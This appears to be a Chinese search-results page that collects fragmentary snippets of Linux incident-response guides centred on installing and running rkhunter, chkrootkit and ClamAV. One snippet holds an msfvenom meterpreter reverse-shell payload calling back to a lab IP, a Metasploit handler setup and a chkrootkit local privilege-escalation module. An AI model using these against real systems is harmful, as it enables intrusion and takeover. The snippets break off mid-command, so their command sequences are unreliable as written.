安装 yum install rkhunter 这个软件需要及时的进行更新库 yum install rkhunter 基础使用方式也很简单 rkhunter -c 这里会检测各种模块 主要检测
RKHunter是Linux系统平台下的一款开源入侵检测工具 特点 (1)安装便捷,运行快速 (2)扫描范围全,能够检测各种已知的rootkit特征码、端口扫描、常用程序文件的变动情况检查 主要功能...4)检测大多常用程序的文件异常属性 (5)扫描任何混杂模式下的接口和后门程序常用的端口 (6)检测如/etc/rc.d/目录下的所有配置文件、日志文件、任何异常的隐藏文件等等 使用方式 执行 rkhunter...的检查命令 # rkhunter -c rkhunter会进行一系列的检测,有问题的部分会给出红色的 Warning 警告,就需要你对这些问题进行处理了 rkhunter是通过自己的数据库来检查的...,所以保持数据库最新非常重要,更新数据库的命令: # rkhunter --update 最好加入到系统的定时任务中 安装 官网 http://rkhunter.sourceforge.net/...下载后解压,我下的是1.4.2版本 tar zxf rkhunter-1.4.2.tar.gz 进入解压后的目录执行安装脚本,非常快 cd rkhunter-1.4.2 .
一、概述 简介 中文名叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检测各种已知的rootkit特征码以外,还支持端口扫描、常用程序文件的变动情况检查...源码下载链接: http://jaist.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz rootkit...rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。...安装 直接yum安装 yum install -y rkhunter 在线升级rkhunter rkhunter是通过一个含有rootkit名字的数据库来检测系统的rootkits漏洞, 所以经常更新该数据库非常重要..., 你可以通过下面命令来更新该数据库: rkhunter --update 为基本系统程序建立校对样本,建议系统安装完成后就建立 rkhunter --propupd 运行rkhunter检查系统 它主要执行下面一系列的测试
Linux入侵排查时安全工具整理 近期有协助网友排查一次Linux云主机中了挖矿病毒的情况: ?...(图片可放大查看) 溯源排查基本步骤可以参考这篇经典文章 《Linux 应急响应入门:入侵排查应该这样做》 网上类似这样文章我也收藏了一些,都总结得非常不错 1、《linux 溯源命令集合-主机层(持续更新...(图片可放大查看) 2、rkhunter 1)rkhunter简介 rkhunter也叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,...2、rkhunter的安装与使用 1)、配置EPEL源后安装rkhunter yum install rkhunter ?...(图片可放大查看) 2)、在线升级rkhunter 的rootkit木马库 rkhunter --update ?
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.63.142 lport=4545 -f elf > shell use exploit.../multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.63.142 set lport 4545...exploit -j exploit/unix/local/chkrootkit CVE-2014-0476 apt install -y rkhunter rkhunter --update...rkhunter --propupd rkhunter --check --sk 4.jpg 3.png 2.png 1.png 0.jpg
概述 Linux环境下处理应急响应事件往往会更加的棘手,因为相比于Windows,Linux没有像Autorun、procexp这样的应急响应利器,也没有统一的应急响应处理流程。...所以,这篇文章将会对Linux环境下的应急响应流程进行讲解,并且提供每一个环节中所用到的shell命令,以帮助大家快速、系统化地处理Linux环境下的病毒。.../chkrootkit 安装rkhunter进行扫描: Wgethttps://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter...-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 ..../installer.sh --install rkhunter -c 最后一个环节往往是大家比较容易遗忘的,Linux平台下90%的病毒是通过网络传播感染的,所以,你的主机之所以会感染病毒,大部分原因也是因为
针对蓝队的一些Linux应急响应的一些常规的命令以及一些思路总结一下分享给大家,内容稍长,可以收藏以备不时之需。...查看Linux中占用资源情况(必须是大写的cpu) top -c -o %CPU -c 显示进程的命令行 -p 显示进程的pid cpu占用前5的信息 ps -eo pid,ppid,%mem,%cpu.../chkrootkit Linux下常用安全工具 rkhunter功能: 系统命令(Binary)检测,包括Md5 校验 Rootkit检测 本机敏感目录、系统配置、服务及套间异常检测 三方应用版本检测...使用方法: Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz...tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 .
https://blog.csdn.net/wh211212/article/details/53063599 RKHunter:检测Rootkit RKHunter 传送门:http...://rkhunter.sourceforge.net/ Root Kit 详解:http://linux.vbird.org/linux_security/0420rkhunter.php...RKHunter 安装 [root@linuxprobe ~]# yum --enablerepo=epel -y install rkhunter 配置和使用RKHunter,对于常规检查,检查脚本安装在...cron.daily目录下,并由Cron每天执行 [root@linuxprobe ~]# vi /etc/sysconfig/rkhunter # recipient address for report...--update # update system file properties [root@linuxprobe ~]# rkhunter --propupd # execute checking
本菜菜今天在处置的时候有遇到一台linux主机 在排查过程中原因好好好好好奇葩 想到大家可能也会遇到很多linux主机,故发一篇这样的文章 虽然今天处置的时候并非本文章情况,等过段时间结束了我在发一下我的处置过程涉及到的技术点以及思路...RootkitHunter #安装 $sudo wget https://jaist.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter...-1.4.4.tar.gz $sudo tar zxvf rkhunter-1.4.4.tar.gz $sudo cd rkhunter-1.4.4 $sudo sh install.sh --install...#使用 $/usr/local/bin/rkhunter --propupd $/usr/local/bin/rkhunter -c --sk --rwo 症状研判-根据主机异常状态判断异常点 性能资源紧张
这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件 /var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用...secure 记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中 注:secure 在一些较新的linux...root ; COMMAND=/sbin/shutdown -r now 常用的shell命令 find、grep 、egrep、awk、sed 1、grep显示前后几行信息: 标准unix/linux...# centos yum install -y rkhunter # ubuntu apt-get install rkhunter rkhunter --update #更新rkhunter版本...rkhunter --propupd #更新rkhunter的特征数据库 # 常见命令 rkhunter --check --sk #自动检测每个部分中间不需要暂停 rkhunter --check
针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。...这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件 /var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用.../chkrootkit rkhunter 网址:http://rkhunter.sourceforge.net 使用方法: Wget https://nchc.dl.sourceforge.net/project.../rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 ....clamscan -r --remove /usr/local/zabbix/sbin #查看日志发现 cat /root/usrclamav.log |grep FOUND 三、webshell查杀 linux
4 echo " ========================================================= " 5 echo " \ Linux...查杀 432 rkhunter --checkall --sk | ag -v 'OK|Not found|None found' 433 else 434 if [ -...e "rkhunter.tar.gz" ]; then 435 tar -zxvf rkhunter.tar.gz >/dev/null 2>&1 436...cd rkhunter-1.4.6/ 437 ....tar -zxvf rkhunter.tar.gz >/dev/null 2>&1 443 cd rkhunter-1.4.6/ 444
/chkrootkit rkhunter 使用方法: wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter...-1.4.4.tar.gz 我测试的时候发现上面链接无法下载了,所以换了下面的链接 wget https://fossies.org/linux/privat/rkhunter-1.4.6.tar.gz...tar -zxvf rkhunter-1.4.6.tar.gz cd rkhunter-1.4.6 ..../installer.sh --install rkhunter -c 攻击维持 查看历史命令 busybox cat ~/.bash_history 检测动态库劫持 查看环境变量动态库劫持 busybox...查看Linux帐户 busybox cat /etc/passwd | grep -v nologin busybox cat /etc/shadow busybox stat /etc/passwd
修改 vmuser 用户密码 注意到挖矿程序都是 vmuser 用户,所以修改 vmuser 用户密码 # passwd vmuser 入侵检测 不放心,使用 rkhunter 检测一下 1....下载安装 # wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz # tar...zxvf rkhunter-1.4.4.tar.gz && tar zxvf rkhunter-1.4.4.tar.gz && cd rkhunter-1.4.4 # ....Please check the log file (/var/log/rkhunter.log) Suspect files 的警告和正常服务器上的一致,这里忽略 3....卸载 rkhunter # cd rkhunter-1.4.4 && ./install.sh --remove
/chkrootkit (2)rkhunter:http:.rkhunter.sourceforge.net wget https://nchc.dl.sourceforge.net/project/rkhunter.../rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4.tar.gz cd rkhunter.../installer.sh --install rkhunter -c 病毒查杀 (1)Clamav:http://www.clamav.net/download.html wget http://nchc.dl.sourceforge.net.../clamscan -r --bell -i /bin 扫描bin目录并且显示有问题的文件的扫描结果 10.webshell查杀 linux版本: 河马webshell查杀:http://www.shellpub.com
2、rootkit后门检测工具RKHunter RKHunter是一款专业的检测系统是否感染rootkit的工具,它通过执行一系列的脚本来确认服务器是否已经感染rootkit。...在官方的资料中,RKHunter可以作的事情有: MD5校验测试,检测文件是否有改动 检测rootkit使用的二进制和系统工具文件 检测特洛伊木马程序的特征码 检测常用程序的文件属性是否异常 检测系统相关的测试...检测隐藏文件 检测可疑的核心模块LKM 检测系统已启动的监听端口 在Linux终端使用rkhunter来检测,最大的好处在于每项的检测结果都有不同的颜色显示,如果是绿色的表示没有问题,如果是红色的...如果要让程序自动运行,可以执行如下命令: [root@server ~]# /usr/local/bin/rkhunter --check --skip-keypress 同时,如果想让检测程序每天定时运行...,那么可以在/etc/crontab中加入如下内容: 30 09 * * * root /usr/local/bin/rkhunter --check --cronjob 这样,rkhunter检测程序就会在每天的
aide --update # 手动覆盖替换旧的数据库 cd /var/lib/aide/ &&mv aide.db.new.gz aide.db.gz # 手动检查命令 aide --check rkhunter...# 基于当前系统建立对比样本 rkhunter --propupd # 手动检查命令 rkhunter --check clamav 测试用例 # test.bat X5O!
RKHunter工具时专门检测系统是否遭受rootkit的一个工具,他通过自动执行一系列的脚本来全面的检测服务器是否感染rootkit。...RKHunter的功能 检测易受攻击的文件; 检测隐藏文件; 检测重要文件的权限; 检测系统端口号; 安装 [root@centos7 aide]$yum install rkhunter 检测...RKHunter检测会分几部分,第一部分主要检测系统的二进制工具,因为这些工具时rootkit的首要感染目标。每检测完一部分需要Enter来确认继续。...RKHunter工具时专门检测系统是否遭受rootkit的一个工具,他通过自动执行一系列的脚本来全面的检测服务器是否感染rootkit。...RKHunter的功能 检测易受攻击的文件; 检测隐藏文件; 检测重要文件的权限; 检测系统端口号; 安装 [root@centos7 aide]$yum install rkhunter 检测 使用命令
本文由马哥教育Linux云计算面授班24期学员推荐,转载自互联网,作者为高俊峰,Linux资深技术专家,畅销书籍《循序渐进Linux》、《高性能Linux服务器构建实战》作者,内容略经小编改编和加工,观点跟作者无关...2、rootkit后门检测工具RKHunter RKHunter是一款专业的检测系统是否感染rootkit的工具,它通过执行一系列的脚本来确认服务器是否已经感染rootkit。...检测隐藏文件 检测可疑的核心模块LKM 检测系统已启动的监听端口 在Linux终端使用rkhunter来检测,最大的好处在于每项的检测结果都有不同的颜色显示,如果是绿色的表示没有问题,如果是红色的...如果要让程序自动运行,可以执行如下命令: [root@server ~]# /usr/local/bin/rkhunter --check --skip-keypress 同时,如果想让检测程序每天定时运行...,那么可以在/etc/crontab中加入如下内容: 30 09 * * * root /usr/local/bin/rkhunter --check --cronjob 这样,rkhunter检测程序就会在每天的
前段时间公司发生了一起服务器入侵事件,在此分享给大家也顺便理顺下linux入侵应急响应思路。 一、事件描述 某天监控同事反馈有台机器cpu飙高到2000%,可能机器已经被黑。...最后 ,使用chkrootkit、clamav、rkhunter一通查杀,当然,还是重装系统最保险。 三、总结 首先啰嗦一下,关于linux主机,高危端口真得万万不能全网开放。...关于linux入侵的排查思路,总结如下: 1.查看异常进程活动-查找是否有异常进程和端口占用 1.1查找占用cpu最多的进程,相关命令:运行top命令后,键入大写字母P按cpu排序; 1.2查找占用内存最多的进程...4.借助工具查杀病毒和rootkit 4.1 查杀rootkit chkrootkit (下载地址-http://www.chkrootkit.org)rkhunter...(下载地址-http://rkhunter.sourceforge.net) 4.2 查杀病毒 clamav(下载地址-http://www.clamav.net/download.html
领取专属 10元无门槛券
手把手带您无忧上云